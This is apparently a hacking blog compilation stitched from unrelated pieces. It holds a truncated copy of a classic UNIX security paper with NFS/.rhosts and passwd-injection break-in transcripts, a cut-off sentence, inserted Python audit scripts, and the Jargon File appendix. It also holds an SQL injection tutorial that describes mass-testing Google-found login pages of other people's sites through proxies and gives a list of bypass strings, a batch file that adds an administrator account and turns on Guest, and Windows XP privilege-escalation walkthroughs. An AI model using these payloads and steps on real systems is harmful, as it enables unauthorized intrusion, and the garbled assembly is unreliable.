Improving the Security of Your Site by Breaking Into it
Introduction
------------
Every day, all over the world, computer networks and hosts are being
broken into. The level of sophistication of these attacks varies
widely; while it is generally believed that most break-ins succeed due
to weak passwords, there are still a large number of intrusions that use
more advanced techniques to break in. Less is known about the latter
types of break-ins, because by their very nature they are much harder to
detect.
-----
CERT. SRI. The Nic. NCSC. RSA. NASA. MIT. Uunet. Berkeley.
Purdue. Sun. You name it, we've seen it broken into. Anything that is
on the Internet (and much that isn't) seems to be fairly easy game. Are
these targets unusual? What happened?
Fade to...
A young boy, with greasy blonde hair, sitting in a dark room. The room
is illuminated only by the luminescence of the C64's 40 character
screen. Taking another long drag from his Benson and Hedges cigarette,
the weary system cracker telnets to the next faceless ".mil" site on his
hit list. "guest -- guest", "root -- root", and "system -- manager" all
fail. No matter. He has all night... he pencils the host off of his
list, and tiredly types in the next potential victim...
This seems to be the popular image of a system cracker. Young,
inexperienced, and possessing vast quantities of time to waste, to get
into just one more system. However, there is a far more dangerous type
of system cracker out there. One who knows the ins and outs of the
latest security auditing and cracking tools, who can modify them for
specific attacks, and who can write his/her own programs. One who not
only reads about the latest security holes, but also personally
discovers bugs and vulnerabilities. A deadly creature that can both
strike poisonously and hide its tracks without a whisper or hint of a
trail. The uebercracker is here.
-----
Why "uebercracker"? The idea is stolen, obviously, from Nietzsche's
uebermensch, or, literally translated into English, "over man."
Nietzsche used the term not to refer to a comic book superman, but
instead a man who had gone beyond the incompetence, pettiness, and
weakness of the everyday man. The uebercracker is therefore the system
cracker who has gone beyond simple cookbook methods of breaking into
systems. An uebercracker is not usually motivated to perform random
acts of violence. Targets are not arbitrary -- there is a purpose,
whether it be personal monetary gain, a hit and run raid for
information, or a challenge to strike a major or prestigious site or
net.personality. An uebercracker is hard to detect, harder to stop, and
hardest to keep out of your site for good.
Overview
--------
In this paper we will take an unusual approach to system security.
Instead of merely saying that something is a problem, we will look
through the eyes of a potential intruder, and show _why_ it is one. We
will illustrate that even seemingly harmless network services can become
valuable tools in the search for weak points of a system, even when
these services are operating exactly as they are intended to.
In an effort to shed some light on how more advanced intrusions occur,
this paper outlines various mechanisms that crackers have actually used
to obtain access to systems and, in addition, some techniques we either
suspect intruders of using, or that we have used ourselves in tests or
in friendly/authorized environments.
Our motivation for writing this paper is that system administrators are
often unaware of the dangers presented by anything beyond the most
trivial attacks. While it is widely known that the proper level of
protection depends on what has to be protected, many sites appear to
lack the resources to assess what level of host and network security is
adequate. By showing what intruders can do to gain access to a remote
site, we are trying to help system administrators to make _informed_
decisions on how to secure their site -- or not. We will limit the
discussion to techniques that can give a remote intruder access to a
(possibly non-interactive) shell process on a UNIX host. Once this is
achieved, the details of obtaining root privilege are beyond the scope
of this work -- we consider them too site-dependent and, in many cases,
too trivial to merit much discussion.
We want to stress that we will not merely run down a list of bugs or
security holes -- there will always be new ones for a potential attacker
to exploit. The purpose of this paper is to try to get the reader to
look at her or his system in a new way -- one that will hopefully afford
him or her the opportunity to _understand_ how their system can be
compromised.
We would also like to reiterate to the reader that the purpose of this
paper is to show you how to test the security of your own site, not how
to break into other people's systems. The intrusion techniques we
illustrate here will often leave traces in your system auditing logs --
it might be constructive to examine them after trying some of these
attacks out, to see what a real attack might look like. Certainly other
sites and system administrators will take a very dim view of your
activities if you decide to use their hosts for security testing without
advance authorization; indeed, it is quite possible that legal action
may be pursued against you if they perceive it as an attack.
There are four main parts to the paper. The first part is the
introduction and overview. The second part attempts to give the reader
a feel for what it is like to be an intruder and how to go from knowing
nothing about a system to compromising its security. This section goes
over actual techniques to gain information and entrance and covers basic
strategies such as exploiting trust and abusing improperly configured
basic network services (ftp, mail, tftp, etc.) It also discusses
slightly more advanced topics, such as NIS and NFS, as well as various
common bugs and configuration problems that are somewhat more OS or
system specific. Defensive strategies against each of the various
attacks are also covered here.
The third section deals with trust: how the security of one system
depends on the integrity of other systems. Trust is the most complex
subject in this paper, and for the sake of brevity we will limit the
discussion to clients in disguise.
The fourth section covers the basic steps that a system administrator
may take to protect her or his system. Most of the methods presented
here are merely common sense, but they are often ignored in practice --
one of our goals is to show just how dangerous it can be to ignore basic
security practices.
Case studies, pointers to security-related information, and software are
described in the appendices at the end of the paper.
While exploring the methods and strategies discussed in this paper we
wrote SATAN (Security Analysis Tool for Auditing Networks.) Written in
shell, perl, expect and C, it examines a remote host or set of hosts and
gathers as much information as possible by remotely probing NIS, finger,
NFS, ftp and tftp, rexd, and other services. This information includes
the presence of various network information services as well as
potential security flaws -- usually in the form of incorrectly setup or
configured network services, well-known bugs in system or network
utilities, or poor or ignorant policy decisions. It then can either
report on this data or use an expert system to further investigate any
potential security problems. While SATAN doesn't use all of the methods
that we discuss in the paper, it has succeeded with ominous regularity
in finding serious holes in the security of Internet sites. It will be
posted and made available via anonymous ftp when completed; Appendix A
covers its salient features.
Note that it isn't possible to cover all possible methods of breaking
into systems in a single paper. Indeed, we won't cover two of the most
effective methods of breaking into hosts: social engineering and
password cracking. The latter method is so effective, however, that
several of the strategies presented here are geared towards acquiring
password files. In addition, while windowing systems (X, OpenWindows,
etc.) can provide a fertile ground for exploitation, we simply don't
know many methods that are used to break into remote systems. Many
system crackers use non-bitmapped terminals which can prevent them from
using some of the more interesting methods to exploit windowing systems
effectively (although being able to monitor the victim's keyboard is
often sufficient to capture passwords). Finally, while worms, viruses,
trojan horses, and other malware are very interesting, they are not
common (on UNIX systems) and probably will use similar techniques to the
ones we describe in this paper as individual parts to their attack
strategy.
Gaining Information
-------------------
Let us assume that you are the head system administrator of Victim
Incorporated's network of UNIX workstations. In an effort to secure
your machines, you ask a friendly system administrator from a nearby
site (evil.com) to give you an account on one of her machines so that
you can look at your own system's security from the outside.
What should you do? First, try to gather information about your
(target) host. There is a wealth of network services to look at:
finger, showmount, and rpcinfo are good starting points. But don't stop
there -- you should also utilize DNS, whois, sendmail (smtp), ftp, uucp,
and as many other services as you can find. There are so many methods
and techniques that space precludes us from showing all of them, but we
will try to show a cross-section of the most common and/or dangerous
strategies that we have seen or have thought of. Ideally, you would
gather such information about all hosts on the subnet or area of attack
-- information is power -- but for now we'll examine only our intended
target.
To start out, you look at what the ubiquitous finger command shows you
(assume it is 6pm, Nov 6, 1993):
victim % finger @victim.com
[victim.com]
Login   Name        TTY  Idle  When       Where
zen     Dr. Fubar   co   1d    Wed 08:00  death.com
Good! A single idle user -- it is likely that no one will notice if you
actually manage to break in.
Now you try more tactics. As every finger devotee knows, fingering "@",
"0", and "", as well as common names, such as root, bin, ftp, system,
guest, demo, manager, etc., can reveal interesting information. What
that information is depends on the version of finger that your target is
running, but the most notable are account names, along with their home
directories and the host that they last logged in from.
To add to this information, you can use rusers (in particular with the
-l flag) to get useful information on logged-in users.
Trying these commands on victim.com reveals the following information,
presented in a compressed tabular form to save space:
Login   Home-dir      Shell      Last login, from where
-----   --------      -----      ----------------------
root    /             /bin/sh    Fri Nov  5 07:42 on ttyp1 from big.victim.com
bin     /bin                     Never logged in
nobody  /                        Tue Jun 15 08:57 on ttyp2 from server.victim.co
daemon  /                        Tue Mar 23 12:14 on ttyp0 from big.victim.com
sync    /             /bin/sync  Tue Mar 23 12:14 on ttyp0 from big.victim.com
zen     /home/zen     /bin/bash  On since Wed Nov  6 on ttyp3 from death.com
sam     /home/sam     /bin/csh   Wed Nov  5 05:33 on ttyp3 from evil.com
guest   /export/foo   /bin/sh    Never logged in
ftp     /home/ftp                Never logged in
Both our experiments with SATAN and watching system crackers at work
have proved to us that finger is one of the most dangerous services,
because it is so useful for investigating a potential target. However,
much of this information is useful only when used in conjunction with
other data.
For instance, running showmount on your target reveals:
evil % showmount -e victim.com
export list for victim.com:
/export (everyone)
/var (everyone)
/usr easy
/export/exec/kvm/sun4c.sunos.4.1.3 easy
/export/root/easy easy
/export/swap/easy easy
Note that /export is exported to the world, and that it contains
/export/foo, user guest's home directory. Time for your first break-in!
In this case, you'll mount the home directory of user "guest." Since you
don't have a corresponding account on the local machine, and since the
NFS server maps the client's root to an unprivileged user (nobody) so that
root cannot modify files on the NFS mounted filesystem, you create a
"guest" account with the same uid (10001) in your local password file.
As user guest you can put an .rhosts entry in the remote guest home
directory, which will allow you to login to the target machine without
having to supply a password.
evil # mount victim.com:/export/foo /foo
evil # cd /foo
evil # ls -lag
total 3
1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .
1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..
1 drwx--x--x 9 10001 daemon 1024 Aug 3 15:49 guest
evil # echo guest:x:10001:1:temporary breakin account:/: >> /etc/passwd
evil # ls -lag
total 3
1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .
1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..
1 drwx--x--x 9 guest daemon 1024 Aug 3 15:49 guest
evil # su guest
evil % echo evil.com >> guest/.rhosts
evil % rlogin victim.com
Welcome to victim.com!
victim %
If, instead of home directories, victim.com were exporting filesystems
with user commands (say, /usr or /usr/local/bin), you could replace a
command with a trojan horse that executes any command of your choice.
The next user to execute that command would execute your program.
We suggest that filesystems be exported:
o Read/write only to specific, trusted clients.
o Read-only, where possible (data or programs can often be
exported in this manner.)
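As an added example (not from the paper), the following Python script does in code what the attacker did by eye above: it parses "showmount -e" output, cross-references it with the home directories learned from finger and rusers, and reports every account whose home directory lies inside a filesystem exported to the world. The sample data is constructed from the victim.com listings in the text; the function names are the example's own.

```python
# Added example, not from the paper: audit "showmount -e" output against the
# home directories gathered from finger/rusers.

# Constructed sample data, modelled on the victim.com listings in the text.
SHOWMOUNT_OUTPUT = """\
export list for victim.com:
/export (everyone)
/var (everyone)
/usr easy
/export/exec/kvm/sun4c.sunos.4.1.3 easy
/export/root/easy easy
/export/swap/easy easy
"""

HOME_DIRS = {
    "root": "/", "zen": "/home/zen", "sam": "/home/sam",
    "guest": "/export/foo", "ftp": "/home/ftp",
}

# Client specs that mean "any host may mount this".
WORLD = ("(everyone)", "*")


def parse_showmount(text):
    """Map each exported path to its list of allowed clients, skipping the header."""
    exports = {}
    for line in text.splitlines():
        parts = line.split(None, 1)
        if len(parts) != 2 or line.startswith("export list"):
            continue
        path, clients = parts
        exports[path] = [c.strip() for c in clients.split(",") if c.strip()]
    return exports


def covering_export(path, exports):
    """Longest exported prefix that contains path, or None.

    Assumes path and the export live on the same filesystem: NFS does not cross
    mount points, so a separate filesystem mounted below an export stays hidden.
    """
    best = None
    for exp in exports:
        if path == exp or path.startswith(exp.rstrip("/") + "/"):
            if best is None or len(exp) > len(best):
                best = exp
    return best


def world_exports(exports):
    """Exports that any host on the network may mount."""
    return sorted(p for p, clients in exports.items()
                  if any(c in WORLD for c in clients))


def exposed_homes(exports, homes):
    """(user, home, export) for every home directory reachable by the world.

    A home directory on such an export can be mounted from any client and an
    .rhosts file planted in it, which is exactly the break-in shown above.
    """
    hits = []
    for user, home in homes.items():
        exp = covering_export(home, exports)
        if exp is not None and any(c in WORLD for c in exports[exp]):
            hits.append((user, home, exp))
    return hits


if __name__ == "__main__":
    exports = parse_showmount(SHOWMOUNT_OUTPUT)
    print("world-mountable:", world_exports(exports))          # ['/export', '/var']
    print("exposed homes:  ", exposed_homes(exports, HOME_DIRS))  # [('guest', '/export/foo', '/export')]
```

Run it against the real output of showmount -e and the account list from finger for your own hosts; anything it reports is a home directory that the whole network can mount and write an .rhosts file into.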
If the target has a "+" wildcard in its /etc/hosts.equiv (the default on
various vendors' machines) or has the netgroups bug (CERT advisory
91:12), any non-root user whose login name also exists in the target's
password file can rlogin to the target without a password. And since the
user "bin" often owns key files and directories, your next attack is to
log in to the target host as bin and modify the password file to give
yourself root access:
evil % whoami
bin
evil % rsh victim.com csh -i
Warning: no access to tty; thus no job control in this shell...
victim % ls -ldg /etc
drwxr-sr-x 8 bin staff 2048 Jul 24 18:02 /etc
victim % cd /etc
victim % mv passwd pw.old
victim % (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd
victim % ^D
evil % rlogin victim.com -l toor
Welcome to victim.com!
victim #
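As an added example (not from the paper), here is a small Python model of the trust decision that rlogin and rsh make from /etc/hosts.equiv and ~/.rhosts. It reproduces both logins shown above, bin through the "+" wildcard and guest through the planted .rhosts, and has a helper that lists the wildcard entries an administrator should remove. The semantics are a simplified version of the BSD ruserok() rules (netgroups are not modelled) and the sample files are constructed for the victim.com scenario.

```python
# Added example, not from the paper: a simplified model of the BSD ruserok()
# check that rlogin/rsh perform against /etc/hosts.equiv and ~/.rhosts.
# Assumed (simplified) semantics; "+@netgroup" entries are not modelled:
#   hosts.equiv "host"        any user on host may log in as the same-named local user
#   hosts.equiv "host user"   that user on host may log in as ANY local user
#   "+" matches any host or any user; "-host" denies that host
#   hosts.equiv never grants root; ~/.rhosts "host [user]" grants login as the file's owner

# Constructed sample files, based on the victim.com scenario in the text.
VICTIM_HOSTS_EQUIV = "big.victim.com\n+\n"   # vendor-default wildcard left in place
GUEST_RHOSTS = "evil.com\n"                  # planted over NFS into guest's home directory


def parse_trust_file(text):
    """Return (host, user) pairs; user is None when the line names only a host."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        entries.append((fields[0], fields[1] if len(fields) > 1 else None))
    return entries


def _host_matches(pattern, remote_host):
    return pattern == "+" or pattern.lower() == remote_host.lower()


def allowed_by_hosts_equiv(entries, remote_host, remote_user, local_user):
    if local_user == "root":            # hosts.equiv is never consulted for root
        return False
    for host, user in entries:
        if host.startswith("-"):        # explicit denial of a host
            if _host_matches(host[1:], remote_host):
                return False
            continue
        if not _host_matches(host, remote_host):
            continue
        if user is None:
            if remote_user == local_user:
                return True
        elif user == "+" or user == remote_user:
            return True                 # "host user" form: any local account
    return False


def allowed_by_rhosts(entries, owner, remote_host, remote_user):
    for host, user in entries:
        if host.startswith("-") or not _host_matches(host, remote_host):
            continue
        if user == "+" or (user or owner) == remote_user:
            return True
    return False


def trusted(hosts_equiv_text, rhosts_text, remote_host, remote_user, local_user):
    """True if remote_user@remote_host may rlogin/rsh as local_user without a password."""
    return (allowed_by_hosts_equiv(parse_trust_file(hosts_equiv_text),
                                   remote_host, remote_user, local_user)
            or allowed_by_rhosts(parse_trust_file(rhosts_text),
                                 local_user, remote_host, remote_user))


def wildcard_entries(text):
    """Entries an administrator should remove: any '+' in the host or user field."""
    return [(h, u) for h, u in parse_trust_file(text) if h == "+" or u == "+"]


if __name__ == "__main__":
    # the two logins from the text: bin via the "+" wildcard, guest via the planted .rhosts
    print(trusted(VICTIM_HOSTS_EQUIV, "", "evil.com", "bin", "bin"))    # True
    print(trusted(VICTIM_HOSTS_EQUIV, "", "evil.com", "bin", "root"))   # False
    print(trusted("", GUEST_RHOSTS, "evil.com", "guest", "guest"))      # True
    print(wildcard_entries(VICTIM_HOSTS_EQUIV))                         # [('+', None)]
```

The point the model makes explicit: a single "+" line in hosts.equiv turns every account name in the password file into a password-less login for anyone who can create that account name on their own machine, and an .rhosts file is only as safe as the directory it lives in.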
A few notes about the method used above; "rsh victim.com
SQL injection Basic Tutorial
One of the major problems with SQL-backed web applications is not SQL itself but the way user input from login forms and URL query strings is pasted straight into queries.
This tutorial does not go into detail on why these strings work.
SEARCH:
admin\login.asp
login.asp
With these two search strings you will have plenty of targets to choose from... finding one that's vulnerable is another question.
WHAT I DO :
First let me go into details on how I go about my research.
I have gathered plenty of injection strings for quite some time, like those below, and have just been granted access to a test machine and will be testing for many variations and new inputs... legally cool... provided by my good friend Gsecur aka ICE, also an Astal member, http://governmentsecurity.org "thanks mate"... gives me a chance to concentrate on what I'm doing and not be looking over my shoulder.
INJECTION STRINGS:HOW ?
This is the easiest part, very simple.
On the login page just enter something like
user: admin (you don't even have to put this)
pass: ' or 1=1--
or
user: ' or 1=1--
admin: ' or 1=1--
Some sites will have just a password, so
password: ' or 1=1--
In fact I have compiled a combo list with strings like this to use on my chosen targets... there are plenty of strings about; the list below is a sample of the most commonly used.
There are many other strings, involving for instance UNION-based queries that read the table structure from error pages;
an attack with that method will eventually reveal admin usernames and passwords... but that's another paper.
The ones I'm interested in give quick access to targets.
PROGRAM
I tried several programs to use with these search strings and up to now only Ares has performed well, with quite a bit
of success with a combo list formatted this way; yesterday I loaded 40 eastern targets with 18 positive hits in a few minutes.
How long would it take to go through 40 sites cutting and pasting each string?
combo example:
admin:' or a=a--
admin:' or 1=1--
and so on... it doesn't have to be admin, it can be anything you want... the most important part is the example ' or 1=1--; this is our injection
string.
Now the only drudge part is finding targets to exploit... so I tend to search, say, Google for login.asp or whatever:
inurl:login.asp
index of:/admin/login.asp
like this: index of login.asp
result:
http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search
17,000 possible targets; trying various searches spews out plenty more.
Now, using proxies set in my browser, I then click through interesting targets... seeing what's what on the site pages; if interesting
I then cut and paste the URL as a possible target... after an hour or so you have a list of potential targets like so:
http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp
and so on... in a couple of hours you can build up quite a list. The reason I don't select all results or spider for login pages is
I want to keep the noise level low... my ISP, well, enough said... plus at the moment I'm on dial-up, so too slow for me.
I then save the list, fire up Ares and enter (1) a proxy list, (2) my target IP list, (3) my combo list... start. Now I don't want to go into
problems with users using Ares... the thing is I know it works for me...
Sit back and wait... any vulnerable target will show up in the hits box. Now when it finds a target it will spew out all the strings on that site as vulnerable... you have to go through each one on the site by cutting and pasting the string till you find the right one... but the thing is you know you CAN access the site... really I need a program that will return the hit with a click on the URL and ignore false outputs.
I'm still looking... the thing is it saves quite a bit of time going to each site and each string to find it's not exploitable.
There you go, you should have access to your vulnerable target by now.
Another thing: you can use the strings in URLs where a parameter such as user= appears. Edit the URL after the = and paste ' or 1=1-- so it becomes
user=' or 1=1--, which is just as quick as the login process.
(Variations)
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
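As an added example that is not part of the original post, the following Python script builds a throw-away SQLite database and shows why the strings above work. The vulnerable login concatenates the form fields into the query text, so ' or 1=1-- in the password field turns the WHERE clause into username = 'admin' AND password = '' or 1=1 and the trailing -- comments out the closing quote. The parameterised version passes the same input as data and is not bypassed. It also shows two things the list alone does not: the ' or 'x'='x form only works in the last field of the WHERE clause (AND binds tighter than OR), and the # variants are MySQL comment syntax that SQLite rejects, which is one reason not every string works against every site. The users table, test accounts and function names are assumptions for the demo.

```python
import sqlite3

# Added example, not from the original post: a throw-away SQLite database with a
# "users" table (assumed schema) and two login routines, one that pastes input into
# the SQL text the way the vulnerable login.asp pages described above do, and one
# that binds parameters.


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                   [("admin", "s3cret"), ("bob", "hunter2")])   # constructed test accounts
    return db


def login_vulnerable(db, username, password):
    """Return the authenticated username, or None. User input is pasted into the SQL."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        return None          # the injected string did not parse on this DBMS
    return row[0] if row else None


def login_safe(db, username, password):
    """Same check with bound parameters: the quote and the -- stay inside the value."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def bypassing_strings(db, variations, field="password"):
    """Which injection strings log somebody in through the vulnerable routine,
    when placed in the given form field."""
    hits = {}
    for s in variations:
        user, pw = ("admin", s) if field == "password" else (s, "whatever")
        who = login_vulnerable(db, user, pw)
        if who is not None:
            hits[s] = who
    return hits


# A subset of the variation list above.
VARIATIONS = ["' or 1=1--", "' or 'x'='x", "' or 0=0 #", "admin'--"]

if __name__ == "__main__":
    db = make_db()
    print(bypassing_strings(db, VARIATIONS))                    # password field
    print(bypassing_strings(db, VARIATIONS, field="username"))  # username field
    print(login_safe(db, "admin", "' or 1=1--"))                # None
```

The first row returned by the bypassed query is whatever the database happens to order first, here the admin account because it has the lowest id; on a real site that is why the same string sometimes logs you in as an ordinary user instead.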
happy hunting
*******************************************
WARNING: the information provided is for educational purposes only and not to be used for malicious purposes. I hold no responsibility
for your actions... do the right thing and let admins know, ay.
******************************************
SATURDAY, OCTOBER 27, 2007
Helping Hacker Culture Grow
If you enjoyed the Jargon File, please help the culture that created it grow and flourish. Here are several ways you can help:
* If you are a writer or journalist, don't say or write hacker when you mean cracker. If you work with writers or journalists, educate them on this issue and push them to do the right thing. If you catch a newspaper or magazine abusing the word `hacker', write them and straighten them out (this appendix includes a model letter).
* If you're a techie or computer hobbyist, get involved with one of the free Unixes. Toss out that lame Microsoft OS, or confine it to one disk partition and put Linux or FreeBSD or NetBSD on the other one. And the next time your friend or boss is thinking about some commercial software `solution' that costs more than it's worth, be ready to blow the competition away with free software running over a free Unix.
* Contribute to organizations like the Free Software Foundation that promote the production of high-quality free software. You can reach the Free Software Foundation at gnu@prep.ai.mit.edu, by phone at +1-617-542-5942, or by snail-mail at 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
* Support the League for Programming Freedom, which opposes over-broad software patents that constantly threaten to blow up in hackers' faces, preventing them from developing innovative software for tomorrow's needs. You can reach the League for Programming Freedom at lpf@uunet.uu.net. by phone at +1 617 621 7084, or by snail-mail at 1 Kendall Square #143, P.O.Box 9171, Cambridge, Massachusetts 02139 USA.
* If you do nothing else, please help fight government attempts to seize political control of Internet content and restrict strong cryptography. As TNHD III went to press, the so-called `Communications Decency Act' had just been declared "unconstitutional on its face" by a Federal court, but the government is expected to appeal. If it's still law when you read this, please join the effort by the Citizens' Internet Empowerment Coalition lawsuit to have the CDA quashed or repealed. Surf to the Center for Democracy and Technology's home page at http://www.cdt.org to see what you can do to help fight censorship of the net.
Here's the text of a letter RMS wrote to the Wall Street Journal to complain about their policy of using "hacker" only in a pejorative sense. We hear that most major newspapers have the same policy. If you'd like to help change this situation, send your favorite newspaper the same letter -- or, better yet, write your own letter.
Dear Editor:
This letter is not meant for publication, although you can publish it if you wish. It is meant specifically for you, the editor, not the public.
I am a hacker. That is to say, I enjoy playing with computers -- working with, learning about, and writing clever computer programs. I am not a cracker; I don't make a practice of breaking computer security.
There's nothing shameful about the hacking I do. But when I tell people I am a hacker, people think I'm admitting something naughty -- because newspapers such as yours misuse the word "hacker", giving the impression that it means "security breaker" and nothing else. You are giving hackers a bad name.
The saddest thing is that this problem is perpetuated deliberately. Your reporters know the difference between "hacker" and "security breaker". They know how to make the distinction, but you don't let them! You insist on using "hacker" pejoratively. When reporters try to use another word, you change it. When reporters try to explain the other meanings, you cut it.
Of course, you have a reason. You say that readers have become used to your insulting usage of "hacker", so that you cannot change it now. Well, you can't undo past mistakes today; but that is no excuse to repeat them tomorrow.
If I were what you call a "hacker", at this point I would threaten to crack your computer and crash it. But I am a hacker, not a cracker. I don't do that kind of thing! I have enough computers to play with at home and at work; I don't need yours. Besides, it's not my way to respond to insults with violence. My response is this letter.
You owe hackers an apology; but more than that, you owe us ordinary respect.
Sincerely, etc.
MONDAY, SEPTEMBER 3, 2007
some links
http://www.showmyip.com/
http://sainathgupta-hacking.blogspot.com/
http://www.securitytaskforce.org/
http://www.blackhat.com/
http://www.blackhat.com/html/bh-usa-06/bh-usa-06-speakers.html
http://www.nag.co.in/ncise.htm
http://www.wtcs.org/snmp4tpc/freeware.htm
http://www.wireshark.org/
http://www.grc.com/default.htm
http://www.thinkdigit.com/index.php?action=pro_how_to&prodid=679
http://www.snort.org/
http://prasadswork.blogspot.com/
http://crack0hack.wetpaint.com/?t=anon
http://www.discoverhacking.c-o.in/
http://crack0hack.wetpaint.com/page/Best+Hacking+Softwares_+1000sw%28Free+download%29
http://www.remote-exploit.org/backtrack_download.html
http://crack0hack.wetpaint.com/rss2_0/pageReport/created?t=anon
THURSDAY, AUGUST 30, 2007
Hack admin from XP guest account (that's possible)
Well, that's possible...
Please don't misuse this article. It's meant for educational purposes only, or for helping those who have lost their password.
Hack "Guest" with admin privileges:
@echo off
title Please wait...
cls
rem create a new local account and make it a member of Administrators
net user Username Password /add
net localgroup Administrators Username /add
rem enable the built-in Guest account, give it the password 420,
rem and move it from the Guests group into Administrators
net user Guest 420 /active:yes
net localgroup Guests Guest /delete
net localgroup Administrators Guest /add
rem delete this batch file
del %0
Copy this to Notepad and save the file as "Guest2admin.bat";
then you can double-click the file to execute it, or run it from cmd.
it works...
Note that every net user ... /add, net user ... /active:yes and net localgroup ... /add or /delete command above changes account data and so requires administrator rights; run from the Guest account or any other limited account, each of them fails with "System error 5 has occurred. Access is denied." The batch file only does what it promises when the account that runs it is already an administrator.
~ Cheers ~
* Hacking "admin" from "user" mode, and more
Really, that is possible!
You know why it is a "user" account: because it lacks privileges that an "administrator" account has.
Using simple command line tools on a machine running Windows XP we will obtain system level privileges, and run the entire explorer process (Desktop), and all processes that run from it, with system privileges. The system run level is higher than administrator, and has full control of the operating system and its kernel. On many machines this can be exploited even with the guest account. At the time I'm publishing this, I have been unable to find any other mention of people running an entire desktop as system, although I have seen some articles regarding the SYSTEM command prompt.
Local privilege escalation is useful on any system that a hacker may compromise; the system account allows for several other things that aren't normally possible (like resetting the administrator password).
The Local System account is used by the Windows OS to control various aspects of the system (kernel, services, etc.); the account shows up as SYSTEM in the Task Manager.
Local System differs from an Administrator account in that it has full control of the operating system, similar to root on a *nix machine. Most System processes are required by the operating system and cannot be closed, even by an Administrator account; attempting to close them will result in an error message.
You can trick the system into running a program, script, or batch file with system level privileges.
One sample
One trick is to abuse the way Windows resolves unquoted paths that contain spaces.
Place an executable named Program.exe in the root directory of the system drive, then reboot. If any startup entry or service is registered as "C:\Program Files\..." without quotes, CreateProcess tries C:\Program.exe before it tries the real path, so your file runs in its place with whatever privileges that entry runs with (SYSTEM, if it is a service).
Microsoft eventually caught on to that trick: Windows XP now warns at logon when a file named Program exists in the root of the system drive, and more and more startup applications are being coded to use limited privileges.
Quote (from Wikipedia, which explains this in an easy-to-understand way):
In Windows NT and later systems derived from it (Windows 2000, Windows XP, Windows Server 2003 and Windows Vista), there may or may not be a superuser. By default, there is a superuser named Administrator, although it is not an exact analogue of the Unix root superuser account. Administrator does not have all the privileges of root because some superuser privileges are assigned to the Local System account in Windows NT.
Under normal circumstances, a user cannot run code as System, only the operating system itself has this ability, but by using the command line, we will trick Windows into running our desktop as System, along with all applications that are started from within.
Getting SYSTEM
I will now walk you through the process of obtaining SYSTEM privileges.
To start, lets open up a command prompt (Start > Run > cmd > [ENTER]).
At the prompt, enter the following command, then press [ENTER]:
Code:
at
If it responds with an "access denied" error, then we are out of luck, and you'll have to try another method of privilege escalation; if it responds with "There are no entries in the list" (or sometimes with multiple entries already in the list) then we are good. Access to the at command varies: by default on Windows XP it requires membership in the local Administrators group, but on some installations even the Guest account can use it. (Windows Vista and later isolate services in session 0, so a task started this way no longer appears on the user's desktop.) If you can use the at command, enter the following command, then press [ENTER]:
Code:
at 15:25 /interactive "cmd.exe"
Let's break down the preceding code. The "at" told the machine to run the at command; everything after that is the arguments for the command. The important thing here is to change the time (24 hour format) to one minute after the time currently set on your computer's clock, for example: if your computer's clock says it's 4:30pm, convert this to 24 hour format (16:30) then use 16:31 as the time in the command. If you issue the at command again with no arguments, the scheduled job should now be listed.
When the system clock reaches the time you set, a new command prompt will magically appear. The difference is that this one is running with system privileges (because it was started by the Task Scheduler service, which runs under the Local System account).
You’ll notice that the title bar has changed from cmd.exe to svchost.exe (which is short for Service Host). Now that we have our system command prompt, you may close the old one. Run Task Manager by either pressing CTRL+ALT+DELETE or typing taskmgr at the command prompt. In task manager, go to the processes tab, and kill explorer.exe; your desktop and all open folders should disappear, but the system command prompt should still be there.
At the system command prompt, enter in the following:
Code:
explorer.exe
A desktop will come back up, but what's this? It isn't your desktop. Go to the start menu and look at the user name; it should say "SYSTEM". Also open up Task Manager again, and you'll notice that explorer.exe is now running as SYSTEM. The easiest way to get back into your own desktop is to log out and then log back in. The following two screenshots showed my results:
[Screenshot: System user name on start menu]
[Screenshot: explorer.exe running under SYSTEM]
What to do now
Now that we have SYSTEM access, everything that we run from our explorer process will have it too, browsers, games, etc. You also have the ability to reset the administrators password, and kill other processes owned by SYSTEM. You can do anything on the machine, the equivalent of root; You are now God of the Windows machine. I’ll leave the rest up to your imagination.
ADMINISTRATOR IN WELCOME SCREEN.
When you install Windows XP an Administrator account is created (you are asked to supply an administrator password), but the Welcome Screen does not give you the option to log on as Administrator unless you boot up in Safe Mode.
First you must ensure that the Administrator account is enabled:
1 Open Control Panel
2 Open Administrative Tools
3 Open Local Security Policy
4 Expand Local Policies
5 Click on Security Options
6 Ensure that "Accounts: Administrator account status" is enabled
Then follow the instructions from the "Win2000 Logon Screen Tweak", i.e.:
1 Open Control Panel
2 Open User Accounts
3 Click "Change the way users log on or log off"
4 Untick "Use the Welcome Screen"
5 Click Apply Options
You will now be able to log on to Windows XP as Administrator in Normal Mode.
EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN!
Start the Registry Editor and go to:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Right-click an empty space in the right pane and select New > DWORD Value. Name the new value Administrator. Double-click this new value, and enter 1 as its Value data. Close the Registry Editor and restart.
Enjoy
MONDAY, AUGUST 27, 2007
NetBios Basic Tutorial !
